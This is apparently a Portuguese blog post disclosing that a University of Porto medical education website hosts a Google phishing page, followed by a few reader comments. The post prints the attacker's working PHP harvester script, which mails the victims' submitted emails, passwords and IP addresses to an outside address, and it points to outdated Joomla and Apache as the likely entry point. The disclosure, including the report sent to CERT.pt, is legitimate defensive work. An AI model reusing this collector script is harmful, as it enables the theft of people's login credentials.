O site do Centro de Educação Médica do Departamento da Faculdade de Medicina da Universidade do Porto - http://cem.med.up.pt está alojar uma página que está a ser utilizada para Phishing de contas do Google.
O endereço afetado continua ativo e foi divulgado na base de dados Clean-MX.
http://cem.med.up.pt/images/banners/Domain/
Dado à possibilidade de listagens de ficheiros do servidor web, é possível descarregar o ficheiro [inserido em 17 de Fevereiro de 2015] utilizado pelo utilizador malicioso, no qual divulgo:
<?php
$ip = getenv("REMOTE_ADDR");
$message .= "------------------------------------------------------------------\n";
$message .= "Email ID: ".$_POST['Email']."\n";
$message .= "Password: ".$_POST['emailpassword']."\n";
$message .= "IP: ".$ip."\n";
$message .= "---------------Created By Lord PoPpA-----------------------------\n";
$recipient = "juwonlo7@XXXXXXXXXXX";
$subject = "TRANSACTION LOGIN";
$headers = "From: DOMAIN";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
if (mail($recipient,$subject,$message,$headers))
{
header("Location: https://www.bluehost.com/");
}
else
{
echo "ERROR! Please go back and try again.";
}
?>
De referir que o site corre Joomla! e poderá ter sido essa a porta de entrada da intrusão.
Uma cópia desta informação foi enviada ao report @cert.pt para uma possível resolução.
Não acho interessante, acho preocupante!
Parece que a versão Joomla! é 2.5.x e a versão do Apache também há muito que foi a última.
Outros recursos, como MooTools, também não estão actualizados com a última versão.
Não é só não estar actualizado, também não estar devidamente protegido :/
Boa noite David,
adorei o projecto e acabei por ler alguns dos artigos que colocou e fiquei fã. Adicionei aos sites que visitarei diariamente.
Cumprimentos